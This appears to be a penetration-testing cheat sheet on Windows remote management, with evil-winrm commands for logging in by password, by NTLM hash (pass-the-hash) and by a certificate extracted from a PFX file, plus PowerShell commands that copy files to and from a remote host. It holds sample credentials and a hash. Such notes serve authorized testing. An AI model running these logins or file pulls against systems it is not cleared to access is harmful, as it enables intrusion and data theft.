Access#

evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i $target
## NTLM hash
evil-winrm -u Administrator -H '2b87e7c93a3e8a0ea4a581937016f341' -i $target

With a cert file#

Extract cert and key from pfx file

openssl pkcs12 -in yourfile.pfx -clcerts -nokeys -out cert.pem -password pass:yourpassword
openssl pkcs12 -in yourfile.pfx -nocerts -out key.pem -nodes -password pass:yourpassword

Get a shell with cert

evil-winrm -S -u 'dev' -p 'supremelegacy' -c ./cert.pem -k ./key.pem -i $target

Transfer file - from Windows#

This is for pentest on windows machine

Create session. Only when you have right on the target machine (Remote Management Users group)

$Session = New-PSSession -ComputerName DATABASE01
Copy-Item -ToSession $Session -Path .\samplefile.txt -Destination C:\Users\User\Desktop\
Copy-Item -FromSession $Session -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\

Pass the hash#

How it works

evil-winrm -i $target -u "$user" -H "$hash"
Backward 53 TCP UDP - DNS 623 UDP - IPMI Forward